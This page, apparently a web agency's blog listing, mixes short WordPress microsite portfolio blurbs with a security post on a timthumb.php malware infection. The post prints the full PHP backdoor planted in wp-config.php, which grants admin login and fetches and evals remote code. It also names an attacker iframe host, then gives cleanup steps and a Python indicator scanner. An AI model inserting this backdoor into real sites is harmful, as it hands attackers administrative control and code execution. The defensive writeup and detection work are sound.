Manfrotto Imagine More

Manfrotto designs, manufactures and markets a wide range of camera and lighting support equipment for the professional photographic, film, theater, live entertainment and video markets. The ManfrottoImagineMore.com project is a marketing website focused on showcasing the story behind some of the more fascinating images. For this project GammaFX built a custom WordPress template from the ground up. Here are some of the highlights: a responsive design that scales automatically to fit any device, whether it is a smartphone or a personal computer; a custom Banner Management module; full localization with support for 6 languages....


New WordPress Malware Attack Exploiting timthumb.php Script

There is a new malware infection that has been affecting thousands of WordPress sites that use the popular timthumb.php image resizing script. Hackers create backdoor access to your website and inject malicious JavaScript that attempts to download various Trojans and malware onto your visitors' computers. At this stage of the infection, attackers are also modifying two WordPress core files: /wp-config.php and /wp-includes/js/l10n.js.

The wp-config.php file gets the following new lines of code, which allow hackers backdoor access to your website:

    if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
        if ($_GET['pass'] == '66f041e16a60928b05a7e228a89c3799'){
            if ($_GET['pingnow']== 'login'){
                $user_login = 'admin';
                $user = get_userdatabylogin($user_login);
                $user_id = $user->ID;
                wp_set_current_user($user_id, $user_login);
                wp_set_auth_cookie($user_id);
                do_action('wp_login', $user_login);
            }
            if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
                $ch = curl_init($_GET['file']);
                $fnm = md5(rand(0,100)).'.php';
                $fp = fopen($fnm, "w");
                curl_setopt($ch, CURLOPT_FILE, $fp);
                curl_setopt($ch, CURLOPT_HEADER, 0);
                curl_setopt($ch, CURLOPT_TIMEOUT, 5);
                curl_exec($ch);
                curl_close($ch);
                fclose($fp);
                echo "// ";
            }
            if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
                $ch = curl_init($_GET['file']);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                curl_setopt($ch, CURLOPT_HEADER, 0);
                curl_setopt($ch, CURLOPT_TIMEOUT, 5);
                $re = curl_exec($ch);
                curl_close($ch);
                eval($re);
            }
        }
    }

The attackers also add a block of obfuscated JavaScript to your l10n.js file; it begins with var _0x4de4=[ and ends in an eval(function(...)) call. This appends an iframe to the bottom of your blog through which they can inject future malware:

    <iframe id="iframe" src="http://counter-wordpress.com/frame.php" style="width: 1px; height: 1px; "></iframe>

Solution

- Immediately remove or update the timthumb.php script. When removing it, don't forget to also update your theme files that rely on this functionality.
- Delete the cache folder located in the root of your template.
- Remove the code above from your wp-config.php file. Normally, the last line of that file should read: require_once(ABSPATH . 'wp-settings.php');
- Remove the code above from the /wp-includes/js/l10n.js file.
- Update all WordPress and FTP passwords for good...
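
One way to check a WordPress document root for the indicators this post describes, as an added example that is not part of the original post. The function names and report wording are assumptions made for illustration; the markers come from the injected code quoted above.

```python
import re
import sys
from pathlib import Path

# Indicators taken from the injected code quoted in the post.
CONFIG_MARKERS = {
    "pingnow backdoor parameter": re.compile(r"\$_GET\[\s*['\"]pingnow['\"]\s*\]"),
    "eval of fetched content": re.compile(r"eval\s*\(\s*\$re\s*\)"),
}
JS_MARKERS = {
    "obfuscated array _0x4de4": re.compile(r"_0x4de4"),
    "iframe host counter-wordpress.com": re.compile(r"counter-wordpress\.com"),
    # Assumption: a stock l10n.js has no eval() call, so any is worth review.
    "eval() call": re.compile(r"\beval\s*\("),
}
# The post says wp-config.php normally ends with this statement
# (parentheses made optional here to tolerate both spellings).
LAST_LINE = re.compile(
    r"require_once\s*\(?\s*ABSPATH\s*\.\s*['\"]wp-settings\.php['\"]\s*\)?\s*;")


def check_text(text, markers):
    return [name for name, rx in markers.items() if rx.search(text)]


def check_wp_config(text):
    findings = check_text(text, CONFIG_MARKERS)
    lines = [s for s in (l.strip() for l in text.splitlines()) if s and s != "?>"]
    if lines and not LAST_LINE.fullmatch(lines[-1]):
        findings.append("unexpected last statement")
    return findings


def scan(root):
    """Return {relative path: [findings]} for a WordPress document root."""
    root, report = Path(root), {}
    checks = {"wp-config.php": check_wp_config,
              "wp-includes/js/l10n.js": lambda t: check_text(t, JS_MARKERS)}
    for rel, check in checks.items():
        path = root / rel
        found = check(path.read_text(errors="replace")) if path.is_file() else []
        if found:
            report[rel] = found
    for path in sorted(root.rglob("timthumb.php")):
        report[path.relative_to(root).as_posix()] = ["timthumb.php present"]
    return report


if __name__ == "__main__":
    for rel, found in scan(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(f"{rel}: {', '.join(found)}")
```

Run it with the site's document root as the only argument; an empty result means none of these specific markers were found, not that the site is clean.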


SkyProdigy Ad Campaign Microsite

To introduce their groundbreaking new SkyProdigy telescopes, Celestron launched an ad campaign centered around Caroline Moore, who discovered a supernova at the age of 14. The GammaFX team designed and built this microsite to support the ad campaign. We also produced all videos that are featured on the website. This site is deployed on the WordPress MultiSite platform, which allows our clients to rapidly deploy microsites with a unified control panel. It also utilizes our Shopatron Checkout Module for WordPress to achieve seamless integration with Shopatron eCommerce...


SkyQ iPhone App Website

This website is dedicated to the first amateur astronomy iOS app launched by Celestron – the world’s leading manufacturer of telescopes and other optical products. This site is deployed on the WordPress MultiSite platform, which allows our clients to rapidly deploy microsites with a unified control panel.
